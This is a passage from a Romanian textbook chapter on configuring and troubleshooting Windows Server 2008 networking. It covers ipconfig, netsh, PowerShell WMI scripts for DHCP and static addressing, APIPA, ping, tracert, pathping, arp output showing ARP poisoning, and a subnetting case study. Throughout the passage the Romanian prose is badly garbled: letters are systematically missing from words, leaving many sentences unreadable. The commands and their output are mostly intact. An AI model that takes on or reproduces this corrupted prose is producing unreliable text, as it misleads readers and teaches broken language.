i fo aţii a default gateway, ad esa u uia sau a ai ulto se e e DN“, u sufi DN“ şi
adrese ale serverelor WINS.
Una dintre cele mai simple comenzi ce pot fi folosite pentru a consulta configu aţia IP a
i te feţelo di siste este ipconfig, e poate fi i t odusă fie î prompt-ul de o a dă fie î
PowerShell. Pe t u a o ţi e i fo aţii e ti se desp e toate i te feţele i stalate î siste se
poate folosi parametrul /all:
PS C:\Users\Administrator> ipconfig /all

[...]
Ethernet adapter Local Area Connection 4:
1
În Windows Vista este posi il a e iul File, Edit, Vie , et . să u fie afişat i pli it. Î a est az, se
ţi e apăsată tasta Alt şi a esta a apă ea.
Media State . . . . . . . . . . . : Media disconnected

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Bluetooth LAN Access Server Driver
Physical Address. . . . . . . . . : 00-19-7D-E1-AC-04
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter Wireless Network Connection:

Description . . . . . . . . . . . : Dell Wireless 1390 WLAN Mini-Card
Physical Address. . . . . . . . . : 00-19-7E-11-91-64
DHCP Enabled. . . . . . . . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::14c8:f79a:2ed7:74a6%16(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.1.2(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Thursday, August 07, 2008 7:04:11 PM
Lease Expires . . . . . . . . . . : Thursday, August 07, 2008 9:48:52 PM
Default Gateway . . . . . . . . . : 192.168.1.1
DHCP Server . . . . . . . . . . . : 192.168.1.1
DHCPv6 IAID . . . . . . . . . . . : 268441982
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-0F-CE-4B-E1-00-19-B9-5E-FA-DE
DNS Servers . . . . . . . . . . . : 192.168.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Media disconnected

Connection-specific DNS Suffix . : fiberlink.rdsnet.ro
Description . . . . . . . . . . . : Broadcom 440x 10/100 Integrated Controller
Physical Address. . . . . . . . . : 00-13-D4-9E-50-C8
DHCP Enabled. . . . . . . . . . . : Yes
[...]
3-15: Fragment din rezultatul comenzii ipconfig /all
Comanda ipconfig poate fi folosită şi pe t u a fo ţa p i i ea u ei o figu aţii p i DHCP,

da ă e istă u astfel de se e î eţea. Pe t u a easta, o a da ipconfig /release şte ge
o figu aţia di a i ă de pe toate i te feţele o figu ate di a i ia o a da ipconfig
/renew t i ite e e i DHCP pe toate i te feţele e au fost setate pe t u o figu a e
auto ată.
Vizualiza ea stă ii u ei o e iu i poate fi ealizată şi p i i te ediul utilita elo Network
Connections şi Network and Sharing Center. Pe t u a afişa fe east a de stare a unei conexiuni
se apasă li d eapta pe u a di t e o e iu ile di Network Connections şi se alege Status din
e iul o te tual sau du lu li di e t sau se apasă di e t pe View Status din dreptul
conexiunii dorite, din Network and Sharing Center.
118 | ‘ e ţ e l e L o a l e
3-16: “tarea u ei o e iu i, î preu ă u detaliile sale
Di fe east a de sta e a o e iu ii se poate a esa şi o fe east ă u detalii desp e

o e iu e, e i lude detalii desp e i te faţa de eţea folosită, ad esele o figu ate şi alte
detalii legate de o figu a ea auto ată da ă este azul .
3.4.4 Configurarea manuală a adreselor )P

O o e iu e poate e efi ia de o o figu aţie IP a uală sau auto ată. Co figu aţia
a uală este de u ită şi o figu aţie stati ă deoa e e pe sistă şi după esta ta ea siste ului
şi este de i po ta ţă iti ă pe t u se e e şi e hipa e te spe ializate î t -o eţea.
Asig a ea a uală a u ei ad ese stati e şi a alto pa a et i de o figu a e IP u ei
conexiuni se face folosind fereastra Internet Protocol Version 4 (TCP/IP) Properties din lista de
p oto oale ataşate u ei o e iu i. Pe t u a o a esa, se des hide fe east a de p op ietăţi a
unei conexiuni (figura 3-13 şi se fa e du lu lic pe Internet Protocol Version 4 (TCP/IPv4).
3-17: Fereastra de configurare a adreselor protocolului IPv4
I pli it, o o e iu e de eţea este setată pe t u a-şi o ţi e auto at o figu aţia. Pe t u

a specifi a o o figu aţie stati ă, este e esa ă sele ta ea opţiu ii Use the following IP address
e e tual î p eu ă u spe ifi a ea u ui se e DN“ p i a şi a u uia alte ati .
Î azul utiliză ii IP , de ele ai ulte o i u este e esa ă o figu a ea de ad ese IPv6
stati pe staţii i doa pe oute e, staţiile o ţi â du-şi i fo aţiile p i auto o figu a e.
Totuşi, Windows Server 2008 pe ite asig a ea de ad ese IP şi la i el de staţii. Pe t u
o figu a ea u ei ad ese IP , p o edu a este a eeaşi a şi la IP , u dife e ţa ă di
fe east a de p op ietăţi a u ei o e iu i se alege Internet Protocol Version 6 (TCP/IPv6).
120 | ‘ e ţ e l e L o a l e
3-18: Fereastra de configurare a adreselor protocolului IPv6
Ate ţie, i t odu e ea u ei ad ese stati e de tip IP e esită şi i t odu e ea u ei ad ese a

unui server DNS de tip IPv6.
3.4.5 Definirea unei configuraţii )P alternative

În cazul în care în aria de broadcast a unui client nu este localizat un server DHCP, un client
ce a fost configurat să îşi o ţi ă o figu aţia IP î od auto at a e u ge la i fo aţiile di
o figu aţia IP alte ati ă, da ă a easta a fost defi ită.
Asig a ea u ei o figu aţii alte ati e se fa e p i sele ta ea pagi ii Alternate
Configuration din ferestrea de configurare Internet Protocol Version 4 (TCP/IPv4) Properties.
Co figu aţia alte ati ă supo tă spe ifi a ea u ei ad ese IP, a u ei ăşti de eţea, a u ui
default gateway, a u uia sau a două se e e DN“ şi a u uia sau a două se e e WIN“.
3-19: Fereastra pe tru o figurația IP alter ati ă
Deoa e e o o figu aţie alte ati ă pe ite u ui al ulato să foloseas ă o o figu aţie IP
spe ifi ă şi detaliată î o e tul î a e u se dete tează u se e DHCP î eţeaua lo ală,
ea este utilă pe t u siste ele o ile a e i ulă î t e eţele, u ele u se e e DHCP ia altele
fă ă.
Pe t u IP u se poate spe ifi a o o figu aţie alte ati ă.
3.4.6 Asignarea automată a adreselor private AP)PA

APIPA este un acronim pentru Automatic Private IP Addressing şi ep ezi tă o fa ilitate de
asig a e auto ată a ad eselo lo ale î eţele te po a e sau ad hoc. Când un calculator ce
ulează Wi do s a fost o figu at să îşi o ţi ă o figu aţia IP î od auto at, da ă u e istă
un server DHCP î eţeaua lo ală şi i i o figu aţia alte ati ă u a fost spe ifi ată, el a
folosi APIPA pentru a-şi asig a o ad esă p i ată di i te alul . . . – 169.254.255.254
se o se ă ă as a de eţea este . . . .
În mod implicit, toate calculatoa ele su t setate să foloseas ă APIPA î azul î a e u
p i es ăspu s de la u se e DHCP di eţeaua lo ală. Mai e a t, după u se o se ă di
figura 3-19, î fe east a de o figu a e alte ati ă este ifată, i pli it, opţiu ea Automatic
Private IP Address eea e e ide ţiază atât lipsa u ei o figu aţii alte ati e ât şi utiliza ea
APIPA. P a ti , se poate o side a ă, î lipsa u ui se e DHCP, este folosită î totdeau a
o figu aţia alte ati ă, hia şi î azul î a e a easta spe ifi ă folosi ea APIPA.
APIPA este o teh i ă utilă pe t u ă ea pe ite al ulatoa elo aflate î a elaşi do e iu
de broadcast să o u i e hia şi î lipsa u ui se e DHCP sau a o i ă ui alt tip de
o figu aţie a uală. De ase e ea, ea ep ezi tă o soluţie alte ati ă şi pe t u situaţia î
a e u se e DHCP de i e efu ţio al1. Da ă la u o e t de tip ulte io se e ul DHCP
ede i e ope aţio al, o figu aţia auto ată a do â di p io itate î ai tea elei setate de
1
Totuşi, da ă u se e DHCP de i e eope aţio al, staţiile o e u ge la APIPA doa după e pi a ea
ti pului de î hi ie e a ulti ei o figu aţii o ţi ute de la a esta, de i t e e ea u se a fa e i sta ta eu.
122 | ‘ e ţ e l e L o a l e
APIPA şi o a es ie, staţiile o ti uâ du-şi o u i aţia folosi d s he a de ad esa e ofe ită

de serverul DHCP1.
Î p a ti ă, se poate dete ta o e tul î a e APIPA a i t at î fu ţiu e da ă două sau
ai ulte al ulatoa e di eţea pot o u i a î t e ele da u şi u altele sau î afa a eţelei.
O p a ti ă e o a dată î a est az este e ifi a ea o figu aţiei IP a staţiilo pe t u a
i de tifi a p eze ţa ad eselo ofe ite de APIPA şi e ifi a ea fu ţio ă ii şi a a esului la
serverul DHCP.
E istă şi o se ie de li ită i i po ta te e t e uie a ute î ede e î o e tul î a e
staţiile su t o figu ate p i APIPA. “p e e e plu, al ulatoa ele o figu ate astfel o putea
o u i a doa u alte al ulatoa e o figu ate p i APIPA di a elaşi do e iu de broadcast
di o side tele ad esă ii IP î i te io ul u ei eţele lo ale, o fi a eptate doa pa hetele
a e apa ţi eţelei al ulate di ad esa IP şi as a o figu ată pe i te faţă . De ase e ea,
staţiile e foloses APIPA u o putea a ea a es la I te et şi nu se pot configura adrese
pe t u se e e DN“ sau WIN“ şi u se poate spe ifi a niciun default gateway.
Ethernet adapter Local Area Connection:
Link-local IPv6 Address . . . . . : fe80::525:fc37:994d:636f%14
IPv4 Address. . . . . . . . . . . : 169.254.216.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
3-20: E e plu de o figurație APIPA frag e t rezultat ipconfig)
APIPA ep ezi tă a ia ta Mi osoft de Zero Configuration. În mod general, tehnica pentru

IP poa tă u ele de ad esa e tip IPV LL IPv4 Link Local). Mai multe detalii despre adresele
locale automate IPv4 pot fi consultate în RFC 39272 iar pentru IPv6 în RFC 48623.
3.5 Configurarea din linia de comandă

Pe t u i spe ta ea şi odifi a ea o figu aţiei IP di li ie de o a dă, Windows Server
2008 pu e la dispoziţie utilita ul netsh. Co a da poate fi folosită a u prompt de o a dă,
introducând doar netsh în cmd.exe sau în PowerShell (ca mai jos) sau se poate scrie fiecare
o a dă u pa a et ii o pleţi pe t u a p i i i ediat u ezultat.
PS C:\Users\Administrator> netsh
netsh>
În general, navigarea prin comenzile disponibile în netsh se poate face treptat, în sensul
ă la fie a e adăuga e a u ui pa a et u, da ă a esta u o stituie o o a dă o pletă,
netsh a afişa o listă u toţi pa a et ii supo taţi î o ti ua e, î p eu ă u o s u tă e pli aţie
a lo . “p e e e plu, da ă se do eşte izualiza ea tutu o o e zilo de tip show, se poate
i t odu e u ătoa ea o a dă:
PS C:\Users\Administrator> netsh interface ipv4 show
The following commands are available:
Commands in this context:
show addresses - Shows IP address configurations.
show compartments - Shows compartment parameters.
show config - Displays IP address and additional information.
show destinationcache - Shows destination cache entries.
show dnsservers - Displays the DNS server addresses.
show dynamicportrange - Shows dynamic port range configuration parameters.
1
E pli aţia pe t u a est o po ta e t stă î faptul ă o staţie a e e u ge la APIPA o a fa e pe t u ă
este setată să o ti ă o o figu aţie auto ată şi u a euşit a est lu u. De i, p a ti , î lo ui ea o figu aţiei
APIPA u ea p i DHCP se fa e deoa e e o figu aţia p i a ă a e p io itate î faţa elei alte ati e.
2
http://tools.ietf.org/html/rfc3927
3
show global - Shows global configuration parameters.

show icmpstats - Displays ICMP statistics.
show interfaces - Shows interface parameters.
show ipaddresses - Shows current IP addresses.
[...]
“e o se ă ă se pot afişa la a est pas o figu aţiile de pe fie a e i te faţă, se e ele DN“
o figu ate, statisti i, ute, o e iu ile a ti e şi o ultitudi e de alte i fo aţii.
Î e e plul u ăto se do eşte sta ili ea u ei o figu aţii stati e pe o a u ită i te faţă.
Pe t u a easta, este e esa să se uleze î tâi o o a dă show a e să listeze i te feţele de
eţea î p eu ă u u e ele lo de o di e:
PS C:\Users\Administrator> netsh interface ipv4 show interfaces
Idx Met MTU State Name
--- --- ----- ----------- -------------------
1 50 4294967295 connected Loopback Pseudo-Interface 1
16 40 1500 connected Wireless Network Connection
10 30 1500 disconnected Local Area Connection
12 20 1500 connected Local Area Connection 2
14 20 1500 connected Local Area Connection 3
17 40 1500 disconnected Local Area Connection 4
Da ă se do eşte odifi a ea o figu aţiei pe t u i te faţa wireless, spre exemplu, din

ezultatul o ţi ut ai sus se eţi e aloa ea â pului Idx din dreptul lui Wireless Network
Connection î azul de faţă .
Î o ti ua e, pe t u a seta o figu aţia stati ă pe i te faţa wireless, se ulează o a da
u ătoa e. Valoa ea folosită pe t u pa a et ul name ep ezi tă i de ul i te feţei etu at de
comanda show p e ede tă:
netsh interface ipv4 set address name=16 source=static address=192.168.100.75
mask=255.255.255.0 gateway=192.168.100.1
Di o e t e p eze ţa u ui se e DN“ este i po ta tă pe t u fu ţio a ea o i ă ei

eţele o e tate la I te et şi iti ă î t -o o figu aţie Active Directory, se poate adăuga
adresa unui server DNS folosind netsh în modul u ăto , folosi d a elaşi i de al i te feţei
pentru a o identifica:
netsh interface ipv4 add dnsserver name=16 address=192.168.100.40
Adăuga ea u ui se e DN“ folosi d netsh permite specificarea unui parametru

suplimentar, index, care permite numerotarea şi, i pli it, i t odu e ea ai ulto se e e
DNS.
Prin intermediul PowerShell se poate o ţi e apid o listă detaliată a tutu o i te feţelo de
eţea i stalate î siste , p i u ătoa ea o a dă
Get-WmiObject -Class Win32_NetworkAdapterConfiguration
În continuare, folosind Win32_NetworkAdapterConfiguration p i WMI şi e ti zâ d

o a da a te ioa ă p i t -o o a dă de fo ata e a ezultatului, se pot o ţi e o listă
si plifi ată a o figu aţiilo IP ale i te feţelo de eţea şi di PowerShell:
PS C:\Users\Administrator> get-wmiobject Win32_NetworkAdapterConfiguration | format-
table IPAddress, Description -autosize
IPAddress Description
--------- -----------
[...]
Broadcom 440x 10/100 Integrated Controller
{192.168.1.2, fe80::14c8:f79a:2ed7:74a6} Dell Wireless 1390 WLAN Mini-Card #3
{192.168.13.1, fe80::9dd5:cc72:ab31:8927} VMware Virtual Ethernet Adapter for VMnet1
{192.168.216.1, fe80::525:fc37:994d:636f} VMware Virtual Ethernet Adapter for VMnet8
Bluetooth LAN Access Server Driver
[...]
3-21: Retur area i terfețelor şi a adreselor IP şi IP orespu zătoare
Pentru o lista e doa a ad eselo IP, se poate folosi şi a ia ta u ătoa e a o e zii:

124 | ‘ e ţ e l e L o a l e
PS C:\> Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=TRUE -

ComputerName . | Select-Object -Property IPAddress
IPAddress
---------
{192.168.1.2, fe80::14c8:f79a:2ed7:74a6}
{192.168.13.1, fe80::9dd5:cc72:ab31:8927}
{192.168.216.1, fe80::525:fc37:994d:636f}
‘ezultatului o ţi ut ai sus i s-a apli at u filt u după p op ietatea IPEnabled pentru a

sele ta doa i te feţele a e au ad ese o figu ate. Parametrul ComputerName urmat de punct
(. ep ezi tă aşi a lo ală ia t i ite ea p i pipe (|) comenzii Select-Object cu
parametrul Property setat i di ă afişa ea doa a p op ietăţii IPAddress a fie ă ui o ie t
returnat.
Din toate comenzile anterioare ce retu ează o ie te u a u ite p op ităţi se o se ă ă
PowerShell afişează i pli it doa âte a di t e ele. Pe t u a afişa toate p op ietăţile u ui
o ie t sau, a î azul de faţă, toate i fo aţiile desp e o e iu ile de eţea, se poate folosi
comanda Select-Object cu parametrul Property, a şi ai sus, da spe ifi â du-i-se
a estuia să afişeze toate p op ietăţile p i t -un wildcard (*):
PS C:\Users\Administrator> Get-WmiObject -Class Win32_NetworkAdapterConfiguration -
Filter IPEnabled=TRUE -ComputerName .| Select-Object -Property * -ExcludeProperty IPX*,WINS*
DHCPLeaseExpires : 20080809144238.000000+120
Index : 7
Description : Dell Wireless 1390 WLAN Mini-Card #3
DHCPEnabled : True
DHCPLeaseObtained : 20080809134238.000000+120
DHCPServer : 192.168.1.1
DNSServerSearchOrder : {192.168.1.1}
IPAddress : {192.168.1.2, fe80::14c8:f79a:2ed7:74a6}
IPEnabled : True
DefaultIPGateway : {192.168.1.1}
InterfaceIndex : 16
IPSubnet : {255.255.255.0, 64}
MACAddress : 00:19:7E:11:91:64
[...]
3-22: Afişarea tuturor proprietăților u ei i terfețe
Co a da de ai sus etu ează i fo aţii detaliate desp e o figu aţia IP, TCP, DN“,
ute, pa a et ii ai p oto olului IP şi dife ite alte apa ilităţi ale i te feţei.
O o a dă utilă pe t u afla ea ad ese IP e te e de pe o staţie di t -o eţea lo ală a e
foloseşte o ad esă p i ată1 este ea de ai jos, e p elu ează ezultatul u ei pagi i etu ate
în urma unei cereri HTML:
PS C:\> $webc = New-Object system.net.webclient
PS C:\> $webc.DownloadString("http://checkip.dydns.com") -replace "[^\d\.]”
78.3.73.215
3.5.1 Verificarea unei conexiuni

Pe lâ ga teh i ile de e ifi a e a stă ii o e iu ilo des ise î se ţiu ea 3.4.3 e istă o
se ie de utilita e î li ie de o a dă, a ping, tracert, pathping şi arp ce mai pot fi folosite
pentru a detecta anumite probleme într-o eţea. Toate a estea pot fi folosite atât di prompt-
ul de o a dă ât şi di PowerShell.
Utilitarul ping e ifi ă doa o e ti itatea pâ ă la i elul u o a u ită desti aţie.

Comporta e tul său este ase ă ăto u el di Li u , u dife e ţa ă i pli it a t i ite doa
pa hete ICMP. Pe t u o listă u pa a et ii supo taţi se foloseşte o a da su fo a ping
1
De reţi ut faptul ă o o a dă p e u ip o fig sau alte o e zi PowerShell e a alizează i te feţele
a afişa ad esa o figu ată pe i te faţă, a e poate fi o ad esă p i ată, hia da ă staţia a e o e ti itate la
Internet prin intermediul unui gateway.
/?. Di a eastă listă se o se ă ă pe t u a t i ite ai ulte pa hete, o a da a eptă

parametrul –n u at de u ă ul do it.
PS C:\Users\Administrator> ping google.com
Pinging google.com [64.233.167.99] with 32 bytes of data:
Reply from 64.233.167.99: bytes=32 time=162ms TTL=246
Ping statistics for 64.233.167.99:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 162ms, Maximum = 173ms, Average = 165ms
3-23: Rezultatul unei comenzi ping
Utilitarul tracert fu ţio ează pe a elasi p oto ol a şi utilita ul ping da u ă eşte

alea pâ ă la desti aţie, etu â d ad esa fie ă ui oute de pe pa u s. Este util pe t u a
dete ta lo ul î a e se e posi il să fi a ut lo o î t e upe e î alea de la su să la desti aţie.
PS C:\Users\Administrator> tracert yahoo.com
Tracing route to yahoo.com [206.190.60.37]
over a maximum of 30 hops:
1 3 ms 38 ms 8 ms mygateway1.ar7 [192.168.1.1]
2 30 ms 26 ms 25 ms 172.29.252.46
3 27 ms 25 ms 25 ms 172.29.32.153
4 31 ms 39 ms 35 ms gtr10-gtr11.ip.t-com.hr [195.29.240.97]
5 41 ms 41 ms 41 ms mil8-hpt-11.mil.seabone.net [195.22.196.81]
6 143 ms 143 ms 143 ms ash2-new11-racc3.new.seabone.net [195.22.216.207]
7 155 ms 155 ms 156 ms g2-12-bas2.dce.yahoo.com [206.223.115.2]
8 157 ms 155 ms 150 ms ae1-p141.msr1.re1.yahoo.com [216.115.108.19]
9 158 ms 156 ms 156 ms ge-9-3.bas-a1.re4.yahoo.com [216.39.49.3]
10 153 ms 153 ms 154 ms yahoo.com [206.190.60.37]
3-24: Rezultatul unei comenzi tracert
“e o se ă ă ad esa fie ă ui oute de pe pa u s este t adusă î u ele său o fo

do e iului DN“ ă eia îi apa ţi e. ‘ezol a ea a esto ad ese poate întârzia mult rezultatul lui
tracert. Pentru a împiedica rezolvarea adreselor în nume se poate folosi parametrul –d.
Utilitarul pathping se asea ă ă u tracert, u e epţia faptului ă s opul său este de a

lo aliza legătu ile di t e su să şi desti aţie a e pie d o azio al pa hete. Pathping trimite
ping-u i fie ă ui oute de pe pa u s, pâ ă la desti aţie şi al ulează u ă ul de ăspu su i
p i ite de la fie a e, a ătâ d p o e tajul de pa hete pie dute pe fie a e legătu ă.
D:\>pathping -n statia1
Tracing route to statia1 [10.54.1.196]
over a maximum of 30 hops:
0 172.16.87.35
1 172.16.87.218
2 192.168.52.1
3 192.168.80.1
4 10.54.247.14
5 10.54.1.196
Computing statistics for 125 seconds...
Source to Here This Node/Link
Hop RTT Lost/Sent = Pct Lost/Sent = Pct Address
0 172.16.87.35
0/ 100 = 0% |
1 41ms 0/ 100 = 0% 0/ 100 = 0% 172.16.87.218
13/ 100 = 13% |
2 22ms 16/ 100 = 16% 3/ 100 = 3% 192.168.52.1
0/ 100 = 0% |
3 24ms 13/ 100 = 13% 0/ 100 = 0% 192.168.80.1
0/ 100 = 0% |
4 21ms 14/ 100 = 14% 1/ 100 = 1% 10.54.247.14
0/ 100 = 0% |
5 24ms 13/ 100 = 13% 0/ 100 = 0% 10.54.1.196
Trace complete.
126 | ‘ e ţ e l e L o a l e
3-25: Rezultatul unei comenzi pathping
Atât ping, pathping ât şi tracert su t utilita e a e se azează pe fu ţio a ea

protocolului de nivel 3 ICMP (Internet Control Message Protocol . Totuşi, t afi ul ICMP este
i pli it lo at de ăt e Windows Firewall atât în Windows Vista ât şi î Windows Server 2008
şi poate fi, de ase e ea, lo at de u ele oute e sau alte firewall-uri (hardware sau software).
Î o se i ţă, o p a ti ă utilă î ai tea testă ii o e ti ităţii p i u ul di t e utilita ele
e u e ate ai sus o ep ezi tă e ifi a ea pe isiu ilo pe t u p oto olul ICMP el puţi p i
firewall-u ile su sei şi desti aţiei. De otat faptul ă e epţia î Windows Firewall pentru ICMP
se poate adăuga e t e de uşo şi doa p i a ti a ea file sharing-ului.
A‘P ep ezi tă atât u ele u ui utilita ât şi al unui protocol. Protocolul ARP (Address
Resolution Protocol este folosit pe t u a e ţi e aso ie ea di t e ad esele IP di eţeaua
lo ală şi ad esele fizi e, MAC ale i te feţelo , pe t u a se putea ealiza ad esa ea la i elul î
interiorul unui LAN. Utilitarul arp ofe ă posi ilitatea de a izualiza şi a odifi a a este aso ie i.
Vizualiza ea aso ie ilo e o ate p i p oto olul A‘P este utilă pe t u ide tifi a ea u o
aso ie i i o e te. “p e e e plu, î azul o e tă ii u o aşi i i tuale p i t -o eţea lo ală,
utilitarul arp poate i di a o e oa e p i faptul ă ele două aşi i i tuale foloses a eeaşi
ad esă MAC. Tot p i a aliza ea aso ie ilo se poate i di a şi p o a ilitatea u ui ata de tip
ARP poisoning, î a e ata ato ul i t odu e fo ţat î ta elele A‘P ale staţiilo p op ia ad esă
MAC, de egulă aso iată u ad esa IP a gateway-ului, interceptând astfel traficul destinat în
afa a eţelei.
Mai jos este exemplificat rezultatul comenzii arp –a pe t u o e o ie A‘P supusă u ui
atac de tip ARP poisoning. “e o se ă ă ad esele IP . . . , . . . şi . . .
su t toate aso iate a eleiaşi ad ese fizi e, -19-5b-22-31-a3. Într-u astfel de az, da ă u a
di t e ad esele . . . sau . . . apa ţi e ata ato ului ia . . .1 este
adresa gateway-ului, a esta a i te epta toate pa hetele t i ise de la staţia u e tă î
e te io ul eţelei lo ale î od o al, sp e gateway).
PS C:\Users\Administrator> arp -a
Interface: 192.168.1.2 --- 0x10
Internet Address Physical Address Type
192.168.1.1 00-19-5b-22-31-a3 dynamic
192.168.1.50 00-18-3a-78-99-f0 dynamic
192.168.1.52 00-19-5b-22-31-a3 dynamic
192.168.1.53 00-19-5b-22-31-a3 dynamic
192.168.1.64 00-1d-60-1c-b5-35 dynamic
[...]
3-26: Comanda arp -a şi ARP poiso i g
P oto olul A‘P u fu ţio ează pe t u IP . Î azul lui IP , apa ea ad eselo IP la

adrese MAC se face printr-un protocol denumit ND (Network Discovery). Drept urmare
atacurile de tip ARP poisoning u fu ţio ează î eţele e foloses adresarea prin IPv6.
3.5.2 Configurări statice şi dinamice prin PowerShelL

Avantajele PowerShell-ului stau în primul rând în posibilitatea de a automatiza sarcini
o ple e sau o su atoa e de ti p. Î p a ti ă, o o figu aţie stati ă sau di a i ă a
parametrilor de eţea, fă ută di PowerShell u e u i i dife ită de u a o ţi ută p i netsh
sau prin intermediul Network Connections, da pe t u eţele a i sau pe t u situaţii î a e
o figu a ea poate de e i ai o ple ă sau pa ti ula ă pe t u a u iţi utilizato i sau sisteme,
este de dorit utilizarea avantajelor oferite de PowerShell, atât din punctul de vedere al
o ple ităţii ât şi di el al uşu i ţei de auto atiza e şi ăspâ di e a s iptu ilo .
Pe t u seta ea o figu aţiilo di a i e sau stati e asup a i te feţelo de eţea se a folosi

WMI şi lasa Win32_NetworkAdapterConfiguration care permite modificarea parametrilor
necesari pentru a realiza aceasta.
3.5.2.1 A ti area o figurării auto ate

Pe t u a o figu a i te feţele de eţea di siste să îşi o ţi ă o figu aţiile auto at, p i
DHCP, se poate ea u s ipt p i paşii u ăto i:
1. Clasa Win32_NetworkAdapterConfiguration deţi e o ultitudi e de etode şi
p op ietăţi e pot fi e u e ate p i o a da Get-Member. “e o se ă ă deţi e o etodă
u ită EnableDHCP şi o proprietate IPEnabled ce vor fi folosite în continuare:
Get-WmiObject win32_networkadapterconfiguration | Get-Member
2. Pe t u a a ti a o figu aţia p i DHCP, t e uie ulată etoda EnableDHCP în contextul

fie ă ei i te feţe de eţea. Î o se i ţă, se o ţi e o listă a i te feţelo filt ate după ele
apa ile de o figu aţii IP, pe t u a e lude i te feţele e foloses NetBEUI, IPX/“PX,
AppleTalk, et , şi se ulează etoda de ai sus pe t u fie a e i te faţă o ţi ută astfel. “ iptul
a e ealizează a easta este u ăto ul:
$interfete = Get-WmiObject Win32_NetworkAdapterConfiguration | Where {$_.IPEnabled -eq "TRUE"}
foreach($interfata in $interfete) {$interfata.EnableDHCP()}
3. Î a est o e t, da ă se a alizează sta ea o figu aţiei di Network Connections, se va

o se a faptul ă i te feţele su t, i t -ade ă , o figu ate pe t u a-şi o ţi e pa a et ii IP p i
DHCP, da ă se e ele DN“ su t î o ti ua e setate la alo ile stati e. Pe t u a easta, se a
folosi metoda SetDNSServerSearchOrder cu parametru nul. Metoda p i eşte, de fapt, o
listă de se e e DN“ pe a e o a o figu a pe i te faţa espe ti ă î o di ea î a e au fost
t i ise a pa a et i. Î azul î a e u p i eşte u pa a et u e des ie u se e DN“,
etoda a a ti a o figu a ea auto ată pe t u se e ele DN“. “ iptul se o pletează u o
linie:
$interfete = Get-WMIObject Win32_NetworkAdapterConfiguration | where{$_.IPEnabled -eq "TRUE"}
foreach($interfata in $interfete)
{
$interfata.EnableDHCP()
$interfata.SetDNSServerSearchOrder()
}
4. Se poate folosi acum comanda ipconfig /all pe t u a e ifi a oua o figu aţie. Da ă s-a
ealizat u su es o ta ta ea se e ului DHCP, t e uie să fie izi il şi i te alul de ti p pe t u
a e o figu aţia auto ată este alidă alo ile Lease Obtained şi Lease Expires).
3.5.2.2 A ti area o figurării stati e

Di lista de etode o ţi ută a te io se sele tează a ele etode e setează pa a et ii
u ei o figu aţii stati e şi se i lud î s iptul u ăto :
$interfete = Get-WMIObject Win32_NetworkAdapterConfiguration | where{$_.IPEnabled -eq "TRUE"}
foreach($interfata in $interfete) {
$interfata.EnableStatic("192.168.171.42", "255.255.255.0")
$interfata.SetGateways("192.168.171.1")
$DNSServers = "198.102.234.125","198.102.234.126"
$interfata.SetDNSServerSearchOrder($DNSServers)
$interfata.SetDynamicDNSRegistration("TRUE")
$interfata.SetWINSServer("198.102.234.125", "198.102.234.126")
}
D ept ezultat, su t o figu ate u alo i stati e: ad esa IP, as a de eţea, default
gateway-ul, se e e DN“ p i ipal şi se u da şi se e e Wi s. Co figu aţia o pletă poate fi
e ifi ată de la p op ietăţile o e iu ii, TCP/IP Properties, la categoria Advanced. Aici pot fi
izualizate o figu aţiile IP, DN“ şi WIN“.
Din moment ce PowerShell lu ează u tipu i de date i e defi ite, este i po ta t de
e a at tipu ile u o pa a et i folosiţi î s iptul de ai sus:
128 | ‘ e ţ e l e L o a l e
 Metoda EnableStatic p i eşte doi pa a et i, ad esa IP şi as a de eţea o espu zătoa e;

 Metoda SetDNSServerSearchOrder p i eşte u e to de şi u i e ide tifi ă se e ele, e
este definit anterior în variabila $DNSServers;
 Metoda SetDynamicDNSRegistration p i eşte o aloa ea oolea ă şi spe ifi ă faptul ă
siste ul a î e a î egist a ea auto ată a ad esei sale de eţea î o espo de ţă u u ele
calculatorului (cel definit la System Properties, din Control Panel), prin DNS. Facilitatea este
utilă î azul î a e o staţie îşi s hi ă eţeaua din care face parte iar adresarea în interiorul
eţelei se fa e pa ţial sau p epo de e t pe ază de u e;
 Metoda SetWINSServer p i eşte di e t doi pa a et i, e ep ezi tă se e ul p i a şi el
se u da , şi u u e to , a î azul se e elo DN“.
3.6 Studiu de caz

O u i e sitate a de is ea ea î ad ul a pusului a u ei eţele i fo ati e u a es la
I te et şi a o ţi ut u ăto ul spaţiu de ad ese: . . . / . ‘eţeaua u ează a fi
î pă ţită astfel: pe t u depa ta e tul de e eta e a e ista o su eţea de al ulatoa e,
pe t u la o atoa e su eţele a âte de al ulatoa e, pe t u se eta iat o su eţea de
al ulatoa e ia î ă i a e ista o su eţea u de al ulatoa e.
1. Ca e este lasa di a e fa e pa te spaţiul de ad ese p i it?
2. Cum t e uie î pă ţit spaţiul de ad ese pe t u a espe ta e i ţele p o le ei?
3. Ce adresa vom aloca gateway-ului ute ului de ieşi e di eţea pe t u eţeaua di ă i ?
4. Ca e este ad esa de difuza e pe t u eţeaua depa ta e tului de e eta e?
5. Câte adrese de staţie su t dispo i ile î eţeaua utilizată de ăt e se eta iat? Ca e su t a este
adrese?
6. Care este a 5-a ad esă de staţie di p i ul la o ato ?
Răspunsuri
1. E p i a ea ze i ală a p i ului o tet di ad esa de eţea dispo i ilă este up i s î i te alul
[192 – , eea e î sea ă ă p i ii t ei iţi ai a estui o tet su t „ , de i ad esa p i ită
apa ţi e lasei C.
2. Pe t u a ezol a p o le a t e uie eate ele i i su eţele des ise î e u ţ. Mai î tâi o

î e a să î pă ţi spaţiul dispo i il astfel î ât toate eţelele să poată o ţi e a elaşi u ă
de staţii. Pe t u a easta t e uie să de ide âţi iţi su t e esa i pe t u defi i ea u ei
su eţele astfel î ât să pute ea disti te . ‘ăspu sul la a eastă î t e a e este dat de
ea ai i ă pute e a lui a e ge e ează u u ă ai a e sau egal u e esa ul de eţele.
